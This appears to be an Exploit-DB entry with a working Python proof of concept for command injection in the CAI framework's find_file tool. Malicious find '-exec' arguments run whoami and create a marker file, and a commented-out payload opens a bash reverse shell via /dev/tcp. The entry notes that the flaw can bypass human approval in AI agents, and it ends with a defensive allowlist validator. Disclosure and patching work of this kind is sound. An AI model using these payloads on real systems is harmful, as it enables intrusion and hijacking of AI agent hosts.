Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection

EDB-ID: 52530
CVE: N/A
Author: BANYAMER
Type: WEBAPPS
Platform: MULTIPLE
Date: 2026-04-30

```python
# Exploit Title: Cybersecurity AI (CAI) Framework 0.5.10 - Command Injection
# CVE: CVE-2026-25130
# Date: 2026-02-03
# Exploit Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# Author GitHub: https://github.com/yourusername
# Vendor Homepage: https://github.com/aliasrobotics/cai
# Software Link: https://github.com/aliasrobotics/cai
# Vulnerable Version: cai-framework <= 0.5.10
# Tested on: cai-framework 0.5.10
# Category: Argument Injection / OS Command Injection
# Platform: Python
# Exploit Type: Unauthenticated / Authenticated depending on agent context (often bypasses human approval)
#
#
# Usage:
#   Run the script directly (local execution)
#   Observe command output or side effects (e.g. whoami result, created files, etc.)

from cai.tools.reconnaissance.filesystem import find_file
import sys


def main():
    print("=== CVE-2026-25130 PoC - find_file Argument Injection / OS Command Injection ===")
    print("Vulnerable cai-framework <= 0.5.10")
    print("This demonstrates command execution via malicious 'args' parameter\n")

    # ────────────────────────────────────────────────────────────────
    # PoC 1: Simple proof – execute 'whoami' via -exec
    # ────────────────────────────────────────────────────────────────
    print("[Test 1] Executing 'whoami' via -exec")
    malicious_args = "-type f -exec whoami \\;"
    try:
        result = find_file(
            file_path="/tmp",  # Any readable directory
            args=malicious_args,
            ctf=None
        )
        print("[+] Command output:\n", result)
    except Exception as e:
        print("[-] Execution failed:", str(e))

    print("\n" + "-"*70 + "\n")

    # ────────────────────────────────────────────────────────────────
    # PoC 2: Touch a proof file (non-destructive marker)
    # ────────────────────────────────────────────────────────────────
    print("[Test 2] Creating marker file /tmp/CAI_CVE_2026_25130_PROOF")
    proof_args = '-type d -exec touch /tmp/CAI_CVE_2026_25130_PROOF \\;'
    try:
        result = find_file(
            file_path="/tmp",
            args=proof_args,
            ctf=None
        )
        print("[+] Result:\n", result)
        print("Check if file exists: ls -l /tmp/CAI_CVE_2026_25130_PROOF")
    except Exception as e:
        print("[-] Execution failed:", str(e))

    print("\n" + "-"*70 + "\n")

    # ────────────────────────────────────────────────────────────────
    # PoC 3: Dangerous example – reverse shell
    # ────────────────────────────────────────────────────────────────
    # print("[Test 3] Reverse shell example (DO NOT RUN UNLESS IN ISOLATED LAB)")
    # rev_args = '-exec bash -c "bash -i >& /dev/tcp/127.0.0.1/4444 0>&1" \\;'
    # find_file("/tmp", rev_args)

    print("\nPoC finished.")
    print("If commands executed successfully → vulnerability confirmed.")
    print("After patch (commit e22a1220) these payloads should be rejected.")


if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("\n[!] Stopped by user.")
    except Exception as e:
        print(f"\n[!] Unexpected error: {e}")
        sys.exit(1)
```
A critical argument injection vulnerability (CVE-2026-25130, CVSS 9.6) in the Cybersecurity AI (CAI) Framework allows unauthenticated or authenticated command execution via malicious arguments passed to the `find_file` function. The vulnerability affects CAI Framework versions up to and including 0.5.10.
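For defenders, the following added example (not code from the CAI project and not its patch) shows one way to reject the `-exec` payloads used in the PoC: parse the caller-supplied `args` into tokens, accept only an allowlist of read-only `find` tests, and run `find` from an argv list with no shell. The names `validate_find_args`, `build_find_argv`, `run_find`, `RejectedArgs` and the allowlist contents are assumptions made for illustration.

```python
import os
import shlex
import subprocess

# Hypothetical allowlist: read-only find(1) tests and the number of operands each
# consumes. Anything absent (-exec, -execdir, -ok, -delete, -fprint, ...) is rejected.
ALLOWED = {"-name": 1, "-iname": 1, "-type": 1, "-maxdepth": 1,
           "-mindepth": 1, "-size": 1, "-mtime": 1, "-print": 0}


class RejectedArgs(ValueError):
    """Raised when args contain a token outside the allowlist."""


def validate_find_args(args: str) -> list[str]:
    """Tokenise args and return them only if every option is allowlisted."""
    try:
        tokens = shlex.split(args)
    except ValueError as exc:  # e.g. unbalanced quotes
        raise RejectedArgs(f"unparseable args: {exc}") from exc
    out, i = [], 0
    while i < len(tokens):
        opt = tokens[i]
        arity = ALLOWED.get(opt)
        if arity is None:
            raise RejectedArgs(f"find option not allowed: {opt!r}")
        operands = tokens[i + 1:i + 1 + arity]
        if len(operands) != arity:
            raise RejectedArgs(f"{opt} needs {arity} operand(s)")
        out += [opt, *operands]
        i += 1 + arity
    return out


def build_find_argv(file_path: str, args: str = "") -> list[str]:
    """Build the argv list; the absolute path can never be parsed as an option."""
    root = os.path.abspath(file_path)
    return ["find", root, *validate_find_args(args)]


def run_find(file_path: str, args: str = "") -> str:
    """Run find without a shell, so metacharacters in operands stay literal."""
    proc = subprocess.run(build_find_argv(file_path, args), capture_output=True,
                          text=True, timeout=30, check=False)
    return proc.stdout
```
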